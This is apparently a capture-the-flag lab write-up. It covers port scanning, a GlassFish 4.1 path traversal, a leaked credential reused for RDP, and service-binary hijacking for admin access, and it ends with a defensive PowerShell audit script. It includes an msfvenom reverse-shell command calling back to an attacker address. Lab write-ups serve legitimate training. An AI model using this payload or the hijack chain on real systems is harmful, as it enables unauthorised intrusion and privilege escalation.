As usual, start with a port scan. Plenty of services showed up, but after actually working through them the only ones worth attention were ports 4848 and 6060. Probing those turned up two services with version numbers, yet repeated searching online found only one vulnerability, a directory traversal in GlassFish, and that one very nearly led me astray.
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
3389/tcp open ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info:
| Target_Name: FISHYYY
| NetBIOS_Domain_Name: FISHYYY
| NetBIOS_Computer_Name: FISHYYY
| DNS_Domain_Name: Fishyyy
| DNS_Computer_Name: Fishyyy
| Product_Version: 10.0.19041
|_ System_Time: 2021-10-30T02:47:37+00:00
|_ssl-date: 2021-10-30T02:47:53+00:00; -3y230d00h01m19s from scanner time.
| ssl-cert: Subject: commonName=Fishyyy
| Not valid before: 2021-10-29T02:39:25
|_Not valid after: 2022-04-30T02:39:25
3700/tcp open giop
| fingerprint-strings:
| GetRequest, X11Probe:
| GIOP
| giop:
| GIOP
| (IDL:omg.org/SendingContext/CodeBase:1.0
| 169.254.159.234
| 169.254.159.234
|_ default
|_giop-info: ERROR: Script execution failed (use -d to debug)
4848/tcp open http Sun GlassFish Open Source Edition 4.1
|_http-server-header: GlassFish Server Open Source Edition 4.1
|_http-title: Login
5040/tcp open unknown
6060/tcp open x11?
| fingerprint-strings:
| GetRequest:
| HTTP/1.1 200
| Accept-Ranges: bytes
| ETag: W/"425-1267803922000"
| Last-Modified: Fri, 05 Mar 2010 15:45:22 GMT
| Content-Type: text/html
| Content-Length: 425
| Date: Sat, 30 Oct 2021 02:45:11 GMT
| Connection: close
| Server: Synametrics Web Server v7
| <html>
| <head>
| <META HTTP-EQUIV="REFRESH" CONTENT="1;URL=app">
| </head>
| <body>
| <script type="text/javascript">
| <!--
| currentLocation = window.location.pathname;
if(currentLocation.charAt(currentLocation.length - 1) == "/"){
| window.location = window.location + "app";
| }else{
| window.location = window.location + "/app";
| //-->
| </script>
| Loading Administration console. Please wait...
| </body>
| </html>
| HTTPOptions:
| HTTP/1.1 403
| Cache-Control: private
| Expires: Thu, 01 Jan 1970 00:00:00 GMT
| Set-Cookie: JSESSIONID=7CF36D08D2EE5F14012A2445FA6E3D4F; Path=/
| Content-Type: text/html;charset=ISO-8859-1
| Content-Length: 5028
| Date: Sat, 30 Oct 2021 02:45:12 GMT
| Connection: close
| Server: Synametrics Web Server v7
| <!DOCTYPE html>
| <html>
| <head>
| <meta http-equiv="content-type" content="text/html; charset=UTF-8" />
| <title>
| SynaMan - Synametrics File Manager - Version: 5.1 - build 1595
| </title>
| <meta NAME="Description" CONTENT="SynaMan - Synametrics File Manager" />
| <meta NAME="Keywords" CONTENT="SynaMan - Synametrics File Manager" />
| <meta http-equiv="X-UA-Compatible" content="IE=10" />
| <link rel="icon" type="image/png" href="images/favicon.png">
| <link type="text/css" rel="stylesheet" href="images/AjaxFileExplorer.css">
| <link rel="stylesheet" type="text/css"
| JavaRMI:
| HTTP/1.1 400
| Content-Type: text/html;charset=utf-8
| Content-Length: 145
| Date: Sat, 30 Oct 2021 02:45:06 GMT
| Connection: close
| Server: Synametrics Web Server v7
|_ <html><head><title>Oops</title><body><h1>Oops</h1><p>Well, that didn't go as we had expected.</p><p>This error has been logged.</p></body></html>
7676/tcp open java-message-service Java Message Service 301
7680/tcp open pando-pub?
8080/tcp open http Sun GlassFish Open Source Edition 4.1
|_http-server-header: GlassFish Server Open Source Edition 4.1
|_http-title: Data Web
| http-methods:
|_ Potentially risky methods: PUT DELETE TRACE
8181/tcp open intermapper?
| ssl-cert: Subject: commonName=localhost/organizationName=Oracle Corporation/stateOrProvinceName=California/countryName=US
| Not valid before: 2014-08-21T13:30:10
|_Not valid after: 2024-08-18T13:30:10
|_ssl-date: TLS randomness does not represent time
8686/tcp open java-rmi Java RMI
| rmi-dumpregistry:
| jmxrmi
| javax.management.remote.rmi.RMIServerImpl_Stub
| @169.254.159.234:8686
| extends
| java.rmi.server.RemoteStub
| extends
|_ java.rmi.server.RemoteObject
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
When I saw this vulnerability I didn't think much of it, because unlike the earlier directory traversal lab this box has no port 22, so I didn't know what to read. So I went off to brute-force the Oracle password; the earlier port probing had yielded some usernames, but you can ignore those here. After brute-forcing for a while it got nowhere, so I had to come back to this vulnerability and start trying the path traversal; the fifth attempt succeeded in reading /windows/win.ini.
On further exploitation I found that, unlike other file-read vulnerabilities, this one can read not only files but directory listings too, which is very convenient. So I went straight back to the config-style files of the two services found earlier to hunt for usernames and passwords. There is no shortcut here; you just look through them one by one (I read offsec's lab description and already knew that only synaman needed looking at, which certainly saved some time).
In one of its files we obtained an SMTP credential, arthurr:KingOfAtlantis. With a credential in hand you naturally try whether it logs in, and we use this command to connect remotely; it works really well.
rdesktop -u arthur -p KingOfAtlantis -a 16 -P -z -b -g 1860x1020 192.168.51.168
After logging in successfully: winpeas has no colour in this cmd window and is hard to read, and I couldn't be bothered to use nc to get a different shell. Since I noticed a totalav program on the user's desktop, I ran sharpup right away to see whether it could be hijacked, because, mate, remember this: in these entry-level labs, any suspicious program or folder on the current user's desktop deserves extra attention. As expected, it looked hijackable.
Being careful, we first use the icacls command to check whether we actually have the necessary permissions; otherwise we'd upload the reverse-shell binary and be stuck unable to replace the file. Here we saw that we have full control, so go ahead.
Then the usual three steps: build the payload, rename the program to be hijacked, and rename our payload to the hijacked program's name, using the move and copy commands. I won't show that here.
msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.49.51 LPORT=3344 -f exe > SecurityService.exe
Then use the shutdown command to reboot the machine, and finally we get administrator privileges. Easy win.
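To catch this class of weakness from the defender's side, here is an added audit script (not from the original writeup) that enumerates Windows services and reports any binary whose ACL grants write-type rights to low-privilege principals, the misconfiguration that sharpup and icacls surfaced above. The group list and the rights pattern are assumptions chosen for the example; run it from an elevated PowerShell prompt.

```powershell
# Added audit example: find service binaries that low-privilege users can modify.
# Assumed list of principals that should never hold write rights on a service binary.
$lowPrivPrincipals = @(
    'Everyone',
    'BUILTIN\Users',
    'NT AUTHORITY\Authenticated Users',
    'NT AUTHORITY\INTERACTIVE'
)
# Assumed pattern of rights that allow replacing or rewriting the file.
$writeRights = 'FullControl|Modify|Write|WriteData|CreateFiles|TakeOwnership|ChangePermissions|AppendData'

function Get-ServiceBinaryPath {
    param([string]$PathName)
    # Strip quotes and arguments from ImagePath, e.g. "C:\x\svc.exe" -k arg  ->  C:\x\svc.exe
    # Non-.exe image paths (kernel drivers etc.) are skipped.
    if ($PathName -match '^"?([^"]*?\.exe)') { return $Matches[1] }
    return $null
}

function Find-WritableServiceBinary {
    Get-CimInstance Win32_Service | ForEach-Object {
        $bin = Get-ServiceBinaryPath $_.PathName
        if (-not $bin -or -not (Test-Path -LiteralPath $bin)) { return }
        $acl = Get-Acl -LiteralPath $bin
        foreach ($ace in $acl.Access) {
            # Numeric generic rights (e.g. 268435456) are not matched by this pattern;
            # treat an unexpected numeric value on a low-privilege principal as worth review.
            if ($ace.AccessControlType -eq 'Allow' -and
                $lowPrivPrincipals -contains $ace.IdentityReference.Value -and
                $ace.FileSystemRights.ToString() -match $writeRights) {
                [pscustomobject]@{
                    Service   = $_.Name
                    RunsAs    = $_.StartName
                    Binary    = $bin
                    Principal = $ace.IdentityReference.Value
                    Rights    = $ace.FileSystemRights
                }
            }
        }
    }
}

Find-WritableServiceBinary | Format-Table -AutoSize
```

Any row returned is a binary that a standard user could swap out before a restart, which is exactly the path used in the writeup; fix it by removing the offending ACE so only Administrators and SYSTEM can write the file.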
Summary:
What I think needs attention in this lab is that after running one service's exploit, if another service is still there, give that service more attention too; of course, that presupposes a chained set of vulnerabilities like this lab has. Beyond that, working through these labs showed that winpeas alone is no longer quite enough; sharpup and the findstr command should be used more. In the end, though, I still think this lab's difficulty is moderate, not very hard, but good for exercising the brain.
Links:
Oracle GlassFish Server 4.1 - Directory Traversal - Multiple webapps Exploit
The link below is the one that misled me into brute-forcing Oracle; always form your own plan first before running other people's exploits.